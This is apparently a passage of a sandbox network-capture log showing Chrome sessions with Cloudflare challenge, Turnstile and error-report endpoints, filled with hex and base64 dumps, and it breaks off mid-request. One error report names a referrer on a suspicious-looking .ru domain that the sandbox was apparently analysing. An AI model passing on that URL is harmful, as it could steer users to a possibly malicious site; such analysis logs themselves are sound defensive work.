                                                                                                        cf-chl-gen: +w+CT/0q9cKk7rELf3931UL1aep8cxubryYwoLSXccz1AbI1t3TfoikEtDKI7GGBd53sWJz36VYe2ibCuVtW1zQpZmK0P77y9OA9kp7C+5hrB9gLXHDvr14aJstjmbXacVgmoOsKnuWrj4JrLnr/7/dsQk6HdHnwnTA9mlsqXmx71lIwzdZAV/NM4nZONqsfSXZVilpv7gvq7SYKb9XaOl7NxNWiMi5wBP5KClAHKTVvJ8uF6WzOwfEVHD0pAlw0EQxwcjdWA2jhv0Kj9MFrV9T24wH2B6Fr0b2FtkNStvWIDGeaTWLHsXa/FmgDEa96eADZkYtTMOomSGEzTgmZIihtg302bFjtJcemaDK38oGsXhioXSkFRCrxikU4hhgFbImccYoleMv2J6Z6mbbl8oC28/JgfU7/ZvjJ/UeWibIkLBu8t15rF6pe+wA7WZ7YcRSRdVsqkCjfQpfTBYqEwrvQ18lpBcG23u8eyT0awI1PISPsPF82v8oqJYyIwPkE2uRf2mmuYtXFd8Ek$0CAb75o//NRN1+p3
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f40fd125f1c3354-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 17:49:16 UTC590INData Raw: 5a 48 64 47 6a 55 68 72 66 49 31 6c 68 55 69 45 63 6d 39 36 57 35 64 76 68 70 69 57 69 61 4a 61 65 59 5a 2b 58 70 78 68 71 57 4f 47 65 5a 32 70 71 59 65 48 62 57 32 71 6b 4c 57 7a 69 34 69 4e 6b 37 75 7a 66 4a 36 58 65 59 4b 51 6a 5a 71 6d 74 34 65 57 6f 63 69 61 6f 36 75 72 69 4c 36 68 30 63 4c 46 77 5a 6a 48 72 71 53 70 32 70 32 39 6c 74 2f 67 72 72 43 31 34 4f 44 57 32 4b 6a 70 37 63 48 62 37 66 48 46 77 4c 4f 7a 79 63 48 59 73 4e 62 49 79 63 7a 4e 33 39 7a 59 39 63 4c 68 41 62 65 34 41 39 55 43 78 75 50 72 32 67 72 58 37 39 34 47 37 51 66 31 41 4e 54 4b 39 78 50 70 31 66 4c 71 2b 78 34 52 33 53 51 44 37 76 76 76 4b 4f 4c 34 33 66 30 74 36 52 30 45 2b 79 55 67 41 69 59 48 4a 77 2f 33 44 42 63 76 4c 2f 41 75 4c 51 73 55 48 52 4d 58 42 52 63 69 51 51 51
                                                                                                        Data Ascii: ZHdGjUhrfI1lhUiEcm96W5dvhpiWiaJaeYZ+XpxhqWOGeZ2pqYeHbW2qkLWzi4iNk7uzfJ6XeYKQjZqmt4eWociao6uriL6h0cLFwZjHrqSp2p29lt/grrC14ODW2Kjp7cHb7fHFwLOzycHYsNbIyczN39zY9cLhAbe4A9UCxuPr2grX794G7Qf1ANTK9xPp1fLq+x4R3SQD7vvvKOL43f0t6R0E+yUgAiYHJw/3DBcvL/AuLQsUHRMXBRciQQQ
                                                                                                        2024-12-18 17:49:16 UTC1369INData Raw: 55 2f 4b 42 67 62 43 53 70 49 4f 45 78 4f 4a 51 5a 42 55 6c 4d 76 53 52 59 6b 44 6a 52 4f 46 68 49 71 48 6a 35 64 58 44 77 30 50 56 45 6e 58 55 70 66 5a 6c 64 43 63 6d 46 46 5a 47 42 72 62 55 70 30 55 46 52 61 62 6d 78 58 56 54 34 35 66 6c 46 68 4f 45 56 2f 63 31 78 31 51 6f 69 42 66 6f 56 71 62 6d 61 4d 64 57 32 4b 55 48 4f 4c 64 56 70 54 65 4a 46 34 57 6e 65 43 57 31 78 30 64 57 53 63 71 61 61 6e 5a 35 65 43 67 4b 4b 47 73 6d 61 50 6a 5a 56 78 6f 37 57 61 76 49 71 39 76 5a 57 54 73 6e 75 53 6c 4c 53 33 77 35 66 49 78 63 71 6c 77 73 37 44 30 59 53 30 79 74 57 71 77 64 57 35 74 4b 79 62 72 74 57 72 75 62 65 37 6d 72 4c 52 70 4c 4f 30 31 36 72 70 34 63 4c 49 35 61 72 52 38 63 7a 42 33 75 50 4a 38 65 33 33 2b 73 58 57 32 2f 58 70 31 63 48 64 7a 66 4c 75 32
                                                                                                        Data Ascii: U/KBgbCSpIOExOJQZBUlMvSRYkDjROFhIqHj5dXDw0PVEnXUpfZldCcmFFZGBrbUp0UFRabmxXVT45flFhOEV/c1x1QoiBfoVqbmaMdW2KUHOLdVpTeJF4WneCW1x0dWScqaanZ5eCgKKGsmaPjZVxo7WavIq9vZWTsnuSlLS3w5fIxcqlws7D0YS0ytWqwdW5tKybrtWrube7mrLRpLO016rp4cLI5arR8czB3uPJ8e33+sXW2/Xp1cHdzfLu2
                                                                                                        2024-12-18 17:49:16 UTC1369INData Raw: 76 4d 42 46 42 49 55 77 6c 51 55 63 4b 53 79 68 4e 52 55 34 34 51 44 59 74 58 55 78 58 48 6b 41 39 5a 6a 4d 36 57 47 4e 64 4b 53 78 69 61 45 56 76 54 6d 63 7a 55 6c 6b 7a 51 6c 42 57 56 31 59 36 65 56 5a 63 65 56 4e 6c 68 58 52 43 52 46 31 64 68 56 68 66 5a 57 35 77 67 6e 74 63 61 70 43 46 6b 6d 74 4d 6d 35 56 2b 62 34 79 56 61 58 5a 56 62 6c 2b 41 6e 70 57 64 59 4b 57 4e 65 71 4f 6a 6a 49 56 74 6f 37 4b 51 61 4b 69 4f 6b 36 57 30 6a 49 5a 36 75 70 4f 58 6e 72 69 55 76 70 4b 59 6d 70 75 38 76 4a 2f 45 69 63 4b 68 71 63 53 38 31 4d 71 50 30 5a 61 75 6a 4e 43 6c 30 4e 36 6f 75 4e 50 52 76 4a 71 7a 70 4a 6e 70 6f 4c 58 68 6e 73 54 63 70 39 43 71 71 76 43 2b 34 71 7a 73 31 62 62 6c 36 72 66 49 41 4c 6e 35 31 37 6a 78 32 4f 4c 6e 32 39 72 6b 31 4d 6e 30 2f 64
                                                                                                        Data Ascii: vMBFBIUwlQUcKSyhNRU44QDYtXUxXHkA9ZjM6WGNdKSxiaEVvTmczUlkzQlBWV1Y6eVZceVNlhXRCRF1dhVhfZW5wgntcapCFkmtMm5V+b4yVaXZVbl+AnpWdYKWNeqOjjIVto7KQaKiOk6W0jIZ6upOXnriUvpKYmpu8vJ/EicKhqcS81MqP0ZaujNCl0N6ouNPRvJqzpJnpoLXhnsTcp9CqqvC+4qzs1bbl6rfIALn517jx2OLn29rk1Mn0/d
                                                                                                        2024-12-18 17:49:16 UTC1369INData Raw: 4c 31 56 48 4e 6b 6f 61 56 6a 45 57 47 30 6b 34 4b 68 6f 7a 57 54 55 68 5a 7a 4a 61 5a 53 73 6f 4c 54 64 4d 50 6d 45 7a 4d 56 52 53 5a 31 42 44 53 33 70 47 66 6c 68 34 63 31 56 32 58 55 39 68 54 6c 42 31 67 31 39 4b 62 45 74 4b 66 32 35 52 57 33 47 55 59 46 56 33 62 6e 70 77 57 31 74 70 6d 35 35 79 6e 33 36 57 6e 47 31 59 5a 34 65 41 64 47 6d 5a 66 34 32 70 68 47 2b 49 6a 47 74 77 69 5a 47 45 70 6f 57 61 72 35 4f 4f 70 36 32 35 65 37 2b 69 74 72 43 31 75 70 6e 47 76 73 65 38 7a 4c 65 78 7a 62 50 48 7a 70 44 53 73 4c 44 49 6c 61 61 71 74 4d 37 56 74 63 43 79 30 36 7a 62 70 63 4f 7a 78 63 72 56 33 74 6a 44 37 65 37 69 75 72 76 6c 39 65 48 6f 72 37 44 77 36 4f 37 71 79 38 65 2f 37 74 33 50 33 64 6e 79 30 74 58 7a 32 67 76 49 39 76 76 73 37 38 6b 4e 42 65 55
                                                                                                        Data Ascii: L1VHNkoaVjEWG0k4KhozWTUhZzJaZSsoLTdMPmEzMVRSZ1BDS3pGflh4c1V2XU9hTlB1g19KbEtKf25RW3GUYFV3bnpwW1tpm55yn36WnG1YZ4eAdGmZf42phG+IjGtwiZGEpoWar5OOp625e7+itrC1upnGvse8zLexzbPHzpDSsLDIlaaqtM7VtcCy06zbpcOzxcrV3tjD7e7iurvl9eHor7Dw6O7qy8e/7t3P3dny0tXz2gvI9vvs78kNBeU
                                                                                                        2024-12-18 17:49:16 UTC1369INData Raw: 6a 67 30 55 78 77 54 47 6b 4e 50 48 31 6b 35 51 6d 45 79 57 31 31 42 50 6d 63 36 52 32 56 6a 59 44 31 51 56 44 52 74 57 6a 4d 30 4e 46 46 61 58 54 68 42 55 47 4e 30 59 31 35 63 57 31 68 54 64 6f 5a 59 5a 30 74 67 58 59 46 2b 59 57 43 57 68 70 56 6e 69 49 5a 77 55 49 6c 7a 56 32 4a 36 65 4a 74 6d 67 5a 2b 69 66 59 4b 63 5a 70 64 74 6d 61 43 68 70 47 75 66 63 5a 47 74 6c 5a 4b 4f 65 62 4b 77 6a 4c 4b 36 73 61 75 66 76 4a 2f 42 71 63 4c 48 68 4c 79 38 76 63 53 4e 70 4d 47 30 31 62 4c 51 78 4e 66 49 32 38 4f 6b 73 64 61 58 73 61 6d 39 6e 62 6d 2b 76 39 6d 6f 74 38 57 6a 36 38 6a 47 76 64 43 78 35 37 4c 4d 38 4d 47 32 34 72 6a 51 75 66 33 37 36 41 48 4c 73 2f 66 32 38 4e 6b 48 34 38 58 54 43 74 73 41 32 64 76 4d 32 51 66 6d 43 4f 6f 50 38 68 48 34 31 50 55 47
                                                                                                        Data Ascii: jg0UxwTGkNPH1k5QmEyW11BPmc6R2VjYD1QVDRtWjM0NFFaXThBUGN0Y15cW1hTdoZYZ0tgXYF+YWCWhpVniIZwUIlzV2J6eJtmgZ+ifYKcZpdtmaChpGufcZGtlZKOebKwjLK6saufvJ/BqcLHhLy8vcSNpMG01bLQxNfI28OksdaXsam9nbm+v9mot8Wj68jGvdCx57LM8MG24rjQuf376AHLs/f28NkH48XTCtsA2dvM2QfmCOoP8hH41PUG
                                                                                                        2024-12-18 17:49:16 UTC1369INData Raw: 52 4d 54 31 70 68 57 43 5a 69 4a 47 56 63 4b 6d 56 49 51 6a 35 64 56 47 52 42 54 47 5a 75 55 6e 64 31 61 45 6c 31 50 6c 56 73 64 30 39 56 55 59 51 36 66 6b 43 47 51 6c 74 4d 51 59 5a 64 69 30 75 54 6c 49 74 7a 55 31 4a 76 56 46 61 59 57 35 43 58 58 46 35 2b 6f 32 4f 62 63 34 68 33 5a 4b 79 46 72 47 36 66 70 36 75 6b 6b 4c 56 72 70 6f 4a 33 6f 59 78 74 6b 4b 57 76 72 6f 6c 35 6e 72 71 78 75 4b 64 2b 6d 61 53 4a 6e 34 6a 49 76 4a 75 49 72 63 69 69 72 5a 50 47 70 4e 4c 42 6c 74 7a 55 31 4c 61 2f 30 37 6e 64 6e 61 36 30 78 63 2f 56 6f 72 57 72 7a 4d 71 74 32 64 6d 35 7a 2b 66 7a 36 4e 62 56 39 2b 58 53 75 39 66 2b 33 37 7a 57 32 50 50 30 37 4e 72 79 35 74 6e 48 39 64 6e 5a 78 64 37 6d 7a 51 6e 4a 43 64 54 6f 42 4d 6b 46 36 67 34 63 30 68 48 76 41 50 67 4e 32
                                                                                                        Data Ascii: RMT1phWCZiJGVcKmVIQj5dVGRBTGZuUnd1aEl1PlVsd09VUYQ6fkCGQltMQYZdi0uTlItzU1JvVFaYW5CXXF5+o2Obc4h3ZKyFrG6fp6ukkLVrpoJ3oYxtkKWvrol5nrqxuKd+maSJn4jIvJuIrciirZPGpNLBltzU1La/07ndna60xc/VorWrzMqt2dm5z+fz6NbV9+XSu9f+37zW2PP07Nry5tnH9dnZxd7mzQnJCdToBMkF6g4c0hHvAPgN2
                                                                                                        2024-12-18 17:49:16 UTC1369INData Raw: 53 54 45 6b 2b 4f 6b 5a 77 50 6b 38 71 63 54 4a 4d 4e 57 35 54 64 6a 4a 64 54 6c 5a 64 50 54 6c 4b 66 30 4a 4e 55 31 31 66 59 47 4a 6e 52 6e 74 36 62 49 75 4c 54 55 70 6f 63 56 46 72 55 32 4e 5a 66 49 36 4c 6a 6d 68 61 66 61 4e 6a 6b 5a 39 69 6f 47 65 41 68 6f 69 55 67 34 39 73 62 36 79 51 66 35 4b 42 64 61 65 41 69 71 75 73 69 48 32 74 6a 6f 36 7a 66 38 4b 78 6d 4d 61 34 70 38 47 2b 71 62 75 74 71 71 79 74 71 61 71 63 6b 4c 62 56 6b 4b 37 4f 7a 70 76 54 33 5a 65 35 6c 35 71 31 35 4e 4c 59 75 73 58 70 36 63 66 45 71 4f 36 71 37 38 54 49 76 65 7a 55 79 76 54 4e 78 2b 61 36 2b 50 6d 30 39 4d 2f 58 30 4e 34 41 31 66 41 48 77 50 75 37 2f 41 4c 71 33 41 58 76 37 74 6b 41 30 65 37 69 42 39 49 42 38 65 6e 79 44 39 6a 62 2f 66 72 65 34 65 7a 30 41 75 59 54 4a 2f
                                                                                                        Data Ascii: STEk+OkZwPk8qcTJMNW5TdjJdTlZdPTlKf0JNU11fYGJnRnt6bIuLTUpocVFrU2NZfI6LjmhafaNjkZ9ioGeAhoiUg49sb6yQf5KBdaeAiqusiH2tjo6zf8KxmMa4p8G+qbutqqytqaqckLbVkK7OzpvT3Ze5l5q15NLYusXp6cfEqO6q78TIvezUyvTNx+a6+Pm09M/X0N4A1fAHwPu7/ALq3AXv7tkA0e7iB9IB8enyD9jb/fre4ez0AuYTJ/
                                                                                                        2024-12-18 17:49:16 UTC1369INData Raw: 4c 6c 31 6f 61 33 56 4f 56 56 6c 6b 5a 47 39 48 63 46 45 36 57 47 31 41 66 30 4a 75 50 33 42 47 61 49 65 48 53 6f 6c 71 52 34 6d 4a 62 47 57 41 68 59 39 55 6b 49 65 51 6b 31 57 54 6d 4b 43 53 67 4a 70 72 6e 5a 39 6a 66 61 6d 62 59 57 47 64 71 6d 71 46 62 47 35 70 72 59 6d 48 68 5a 2b 6f 62 34 4f 50 64 62 4f 53 73 5a 70 39 6c 49 35 36 6f 4c 4b 52 78 37 61 47 68 71 47 6b 72 4b 2b 47 69 72 7a 49 78 4e 62 4f 31 4d 71 7a 71 72 48 50 32 62 61 2f 71 73 44 61 33 70 79 66 6e 4f 57 6b 34 38 65 70 78 75 4f 70 71 4f 47 6e 33 71 79 74 73 71 33 70 74 4f 50 74 2b 4e 6a 53 7a 4c 2f 34 76 4f 76 4d 74 76 4d 46 77 76 44 71 35 41 30 4a 42 38 62 72 45 65 45 53 35 75 6e 4d 42 39 41 44 43 68 44 5a 31 78 62 75 39 66 62 71 38 50 76 61 41 53 4c 35 47 52 6f 4b 33 65 50 33 46 78 76
                                                                                                        Data Ascii: Ll1oa3VOVVlkZG9HcFE6WG1Af0JuP3BGaIeHSolqR4mJbGWAhY9UkIeQk1WTmKCSgJprnZ9jfambYWGdqmqFbG5prYmHhZ+ob4OPdbOSsZp9lI56oLKRx7aGhqGkrK+GirzIxNbO1MqzqrHP2ba/qsDa3pyfnOWk48epxuOpqOGn3qytsq3ptOPt+NjSzL/4vOvMtvMFwvDq5A0JB8brEeES5unMB9ADChDZ1xbu9fbq8PvaASL5GRoK3eP3Fxv
                                                                                                        2024-12-18 17:49:16 UTC1369INData Raw: 57 52 33 5a 6c 4e 35 63 48 31 50 63 6e 55 2f 51 48 74 75 64 6f 52 36 56 6b 4e 70 56 6d 68 6d 58 48 79 4a 66 5a 46 39 67 57 65 4c 64 55 74 7a 67 35 74 6c 63 6f 6c 33 6f 6f 32 59 64 4a 4a 78 68 4b 53 49 5a 5a 64 72 62 5a 65 41 6d 36 57 43 68 58 79 4b 73 35 65 50 71 34 31 30 65 6f 79 4d 64 37 4e 7a 6d 38 4b 65 67 62 43 33 73 71 47 44 6c 49 57 69 6d 59 6d 77 7a 6f 54 4a 31 61 65 51 69 63 65 73 71 64 47 76 6e 64 32 32 71 4a 69 63 75 64 54 56 34 4d 6a 57 77 74 7a 41 31 64 33 4e 36 71 69 74 71 50 4c 41 74 61 32 77 34 39 6a 4e 35 2f 33 33 76 75 7a 7a 37 51 50 37 7a 74 76 55 2f 76 58 38 2b 2b 76 6a 31 73 6e 46 37 2b 63 50 38 65 58 6e 39 4f 48 6e 34 65 37 6b 44 52 33 70 30 51 72 5a 34 50 6e 65 4a 65 58 2b 48 68 37 71 42 52 58 35 46 79 49 64 43 67 45 70 45 51 34 71
                                                                                                        Data Ascii: WR3ZlN5cH1PcnU/QHtudoR6VkNpVmhmXHyJfZF9gWeLdUtzg5tlcol3oo2YdJJxhKSIZZdrbZeAm6WChXyKs5ePq410eoyMd7Nzm8KegbC3sqGDlIWimYmwzoTJ1aeQicesqdGvnd22qJicudTV4MjWwtzA1d3N6qitqPLAta2w49jN5/33vuzz7QP7ztvU/vX8++vj1snF7+cP8eXn9OHn4e7kDR3p0QrZ4PneJeX+Hh7qBRX5FyIdCgEpEQ4q


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.2.74982135.190.80.14439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:16 UTC476OUTPOST /report/v4?s=NK60VD7izjfkFcqHBZDOlRao%2Fj3PMbOBoyKjf%2FtNXQGaIWdPiCn9szmD1PFGjeP3eUoPI4wNhM0HP2i96pRps2cMjiBZLFbP6urmMvv%2BbzJzoe3UZIhqWOqT1frGig%3D%3D HTTP/1.1
                                                                                                        Host: a.nel.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 424
                                                                                                        Content-Type: application/reports+json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:16 UTC424OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 36 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 34 72 2e 74 61 74 63 68 61 72 63 2e 72 75 2f 68 64 6c 56 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 35 33 2e 32 34 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75
                                                                                                        Data Ascii: [{"age":1,"body":{"elapsed_time":864,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://4r.tatcharc.ru/hdlV/","sampling_fraction":1.0,"server_ip":"172.67.153.247","status_code":404,"type":"http.error"},"type":"network-error","u
                                                                                                        2024-12-18 17:49:16 UTC168INHTTP/1.1 200 OK
                                                                                                        Content-Length: 0
                                                                                                        date: Wed, 18 Dec 2024 17:49:16 GMT
                                                                                                        Via: 1.1 google
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.2.749827104.18.94.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:18 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2000292729:1734542240:X0lCKVmzbenQfrsiKz-FVaH0wGrZC2Dr08uWAScPXbQ/8f40fce70d2b43c1/V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:19 UTC379INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 18 Dec 2024 17:49:19 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        cf-chl-out: c70ztapzTsTLQSJqw6iFPqx6//vmJuDUkf8=$wF53u1XHn2AnY6uY
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f40fd2298d28cb9-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 17:49:19 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.2.749830104.18.95.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:19 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f40fce70d2b43c1/1734544156658/pyZm-HMUItdel49 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:19 UTC200INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 17:49:19 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f40fd26d89e1a2c-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 17:49:19 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 03 00 00 00 2a 08 02 00 00 00 f9 e9 76 16 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDR*vIDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        21192.168.2.749837104.18.94.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:21 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f40fce70d2b43c1/1734544156658/pyZm-HMUItdel49 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:21 UTC200INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 17:49:21 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f40fd315cfcc324-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 17:49:21 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 03 00 00 00 2a 08 02 00 00 00 f9 e9 76 16 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDR*vIDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        22192.168.2.749841104.18.95.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:21 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f40fce70d2b43c1/1734544156660/e48b08b797227e0d4a3633050dffc9324e8e3ede998da3808dab9e337ca5ef1b/WEQGbHJaCLJFXt6 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: max-age=0
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:22 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                        Date: Wed, 18 Dec 2024 17:49:21 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Content-Length: 1
                                                                                                        Connection: close
                                                                                                        2024-12-18 17:49:22 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 35 49 73 49 74 35 63 69 66 67 31 4b 4e 6a 4d 46 44 66 5f 4a 4d 6b 36 4f 50 74 36 5a 6a 61 4f 41 6a 61 75 65 4d 33 79 6c 37 78 73 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g5IsIt5cifg1KNjMFDf_JMk6OPt6ZjaOAjaueM3yl7xsAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                        2024-12-18 17:49:22 UTC1INData Raw: 4a
                                                                                                        Data Ascii: J


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        23192.168.2.749847104.18.95.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:23 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2000292729:1734542240:X0lCKVmzbenQfrsiKz-FVaH0wGrZC2Dr08uWAScPXbQ/8f40fce70d2b43c1/V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 31771
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
